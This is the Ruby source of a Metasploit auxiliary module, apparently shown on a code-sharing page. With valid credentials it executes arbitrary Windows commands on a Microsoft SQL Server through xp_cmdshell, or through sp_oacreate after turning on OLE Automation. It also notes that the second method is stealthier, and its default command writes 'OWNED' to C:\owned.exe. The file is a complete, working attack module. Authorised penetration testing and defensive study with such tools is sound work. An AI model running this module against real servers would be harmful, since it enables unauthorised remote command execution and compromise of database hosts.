Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::MSSQL
8
  include Msf::OptionalSession::MSSQL
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Microsoft SQL Server Command Execution',
15
        'Description' => %q{
16
          This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the
17
          sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is
18
          required to use this module.
19
        },
20
        'Author' =>
21
          [
22
            'tebo <tebo[at]attackresearch.com>',
23
            'arcc <pw[at]evait.de>'
24
          ],
25
        'License' => MSF_LICENSE,
26
        'References' =>
27
          [
28
            [ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
29
            [ 'URL', 'https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql'],
30
          ],
31
      )
32
    )
33

34
    register_options([
35
      OptString.new('CMD', [ false, 'Command to execute', 'cmd.exe /c echo OWNED > C:\\owned.exe']),
36
      OptEnum.new('TECHNIQUE', [true, 'Technique to use for command execution', 'xp_cmdshell', ['xp_cmdshell', 'sp_oacreate']])
37
    ])
38
  end
39

40
  def run
41
    if session
42
      set_mssql_session(session.client)
43
    else
44
      unless mssql_login_datastore
45
        print_error("Error with mssql_login call")
46
        info = self.mssql_client.initial_connection_info
47
        if info[:errors] && !info[:errors].empty?
48
          info[:errors].each do |err|
49
            print_error(err)
50
          end
51
        end
52
        return
53
      end
54
    end
55

56
    technique = datastore['TECHNIQUE']
57
    case technique
58
    when 'xp_cmdshell'
59
      begin
60
        mssql_xpcmdshell(datastore['CMD'], true)
61
      rescue RuntimeError
62
        print_status('Error while running "xp_cmdshell" method...retrying with "sp_oacreate" method')
63
        mssql_spoacreate
64
      end
65
    when 'sp_oacreate'
66
      mssql_spoacreate
67
    end
68
  end
69

70
  def mssql_spoacreate
71
    doprint = datastore['VERBOSE']
72
    print_status('Enabling advanced options and ole automation procedures.')
73
    mssql_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;", doprint)
74
    mssql_query("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", doprint)
75
    print_good('Executing command using sp_oacreate. No output will be displayed.')
76
    mssql_query("DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, '#{datastore['CMD']}';", doprint)
77
  end
78
end
79

80